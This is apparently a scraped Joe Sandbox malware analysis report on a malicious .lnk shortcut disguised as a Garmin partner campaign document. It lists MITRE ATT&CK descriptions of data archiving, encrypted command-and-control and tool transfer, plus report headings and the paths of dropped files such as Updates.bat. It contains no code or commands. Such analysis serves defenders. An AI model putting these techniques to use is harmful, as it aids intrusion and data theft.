Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 3_Garmin_Campaign Information for Partners(12-11).docx.lnk.download.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Other

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\Document.zip

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\Updates.bat

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5jk3wqfl.leh.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aappqgy0.ybx.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_acask3vz.k1m.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_avs4yr2h.ahn.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bj3xprun.jju.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gqxc2osv.efi.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o0hwys5x.eu4.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yhlkn0ba.atn.psm1

C:\Windows\System32\tmp

\Device\Null

Static File Info

General

File Icon

Windows Analysis Report
3_Garmin_Campaign Information for Partners(12-11).docx.lnk.download.lnk